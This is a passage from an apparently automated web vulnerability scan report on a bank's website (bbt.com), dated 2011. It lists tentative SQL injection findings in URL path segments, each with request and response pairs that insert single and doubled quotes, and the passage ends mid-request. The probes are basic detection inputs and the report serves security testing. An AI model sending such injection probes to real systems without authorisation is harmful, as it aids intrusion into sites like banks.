Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:13:56 GMT
location: http://www.bbt.com/bbt/includes%27%27/javascript/swapimage.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 160
cache-control: private
x-powered-by: ASP.NET
Content-Length: 164

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes%27%27/javascript/swapimage.js">here</a>.</body>

1.72. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/swapimage.js

Issue detail

Request 1

GET /bbt/includes/javascript'/swapimage.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:14:03 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes/javascript''/swapimage.js HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:14:03 GMT
location: http://www.bbt.com/bbt/includes/javascript%27%27/swapimage.js
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 160
cache-control: private
x-powered-by: ASP.NET
Content-Length: 164

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript%27%27/swapimage.js">here</a>.</body>

1.73. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/includes/javascript/swapimage.js

Issue detail

Request 1

GET /bbt/includes/javascript/swapimage.js' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 1

HTTP/1.1 404 - Not Found
content-type: text/html
date: Thu, 03 Feb 2011 14:14:07 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET
Content-Length: 15545

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/includes/javascript/swapimage.js'' HTTP/1.1
Host: www.bbt.com
Proxy-Connection: keep-alive
Referer: http://www.bbt.com/bbt'/includes/chat/mtagconfig.js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR; CampIDMaj=AGM; ReferralSource=AE; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; s_cc=true; s_campaign=1635; s_nr=1296740587220; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; 2489482-VID=16101423669632; 2489482-SKEY=2662170475251338767; HumanClickSiteContainerID_2489482=STANDALONE

Response 2

HTTP/1.1 302 Object moved
content-type: text/html
date: Thu, 03 Feb 2011 14:14:07 GMT
location: http://www.bbt.com/bbt/includes/javascript/swapimage.js%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 160
cache-control: private
x-powered-by: ASP.NET
Content-Length: 164

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/includes/javascript/swapimage.js%27%27">here</a>.</body>

1.74. http://www.bbt.com/bbt/locator/default.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/locator/default.html

Issue detail

Request 1

GET /bbt'/locator/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:32 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/locator/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:32 GMT
location: http://www.bbt.com/bbt/%27%27/locator/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 149
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/locator/default.html">here</a>.</body>

1.75. http://www.bbt.com/bbt/locator/default.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/locator/default.html

Issue detail

Request 1

GET /bbt/locator'/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

Request 2

GET /bbt/locator''/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:44 GMT
location: http://www.bbt.com/bbt/locator%27%27/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 148
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/locator%27%27/default.html">here</a>.</body>

1.76. http://www.bbt.com/bbt/locator/default.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/locator/default.html

Issue detail

Request 1

GET /bbt/locator/default.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:50 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/locator/default.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 14:12:53 GMT
location: http://www.bbt.com/bbt/locator/default.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 148
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/locator/default.html%27%27">here</a>.</body>

1.77. http://www.bbt.com/bbt/mobile/mobile-product.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/mobile/mobile-product.html

Issue detail

Request 1

GET /bbt'/mobile/mobile-product.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:36 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/mobile/mobile-product.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:36 GMT
location: http://www.bbt.com/bbt/%27%27/mobile/mobile-product.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 155
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/mobile/mobile-product.html">here</a>.</body>

1.78. http://www.bbt.com/bbt/mobile/mobile-product.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/mobile/mobile-product.html

Issue detail

Request 1

GET /bbt/mobile'/mobile-product.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

Request 2

GET /bbt/mobile''/mobile-product.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:43 GMT
location: http://www.bbt.com/bbt/mobile%27%27/mobile-product.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 154
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/mobile%27%27/mobile-product.html">here</a>.</body>

1.79. http://www.bbt.com/bbt/mobile/mobile-product.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/mobile/mobile-product.html

Issue detail

Request 1

GET /bbt/mobile/mobile-product.html' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

Request 2

GET /bbt/mobile/mobile-product.html'' HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:54 GMT
location: http://www.bbt.com/bbt/mobile/mobile-product.html%27%27
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 154
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/mobile/mobile-product.html%27%27">here</a>.</body>

1.80. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/checkcard/default.html

Issue detail

Request 1

GET /bbt'/personal/products/checkcard/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:40 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt''/personal/products/checkcard/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:40 GMT
location: http://www.bbt.com/bbt/%27%27/personal/products/checkcard/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 169
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/personal/products/checkcard/default.html">here</a>.</body>

1.81. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/checkcard/default.html

Issue detail

Request 1

GET /bbt/personal'/products/checkcard/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 1

HTTP/1.1 404 - Not Found
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:46 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 15405
cache-control: private
x-powered-by: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="DCS.dcsuri" content="/404error"/>
...[SNIP]...

Request 2

GET /bbt/personal''/products/checkcard/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;

Response 2

HTTP/1.1 302 Object moved
connection: close
content-type: text/html
date: Thu, 03 Feb 2011 13:48:48 GMT
location: http://www.bbt.com/bbt/personal%27%27/products/checkcard/default.html
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 168
cache-control: private
x-powered-by: ASP.NET

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/personal%27%27/products/checkcard/default.html">here</a>.</body>

1.82. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bbt.com
Path:	/bbt/personal/products/checkcard/default.html

Issue detail

Request 1

GET /bbt/personal/products'/checkcard/default.html HTTP/1.1
Host: www.bbt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
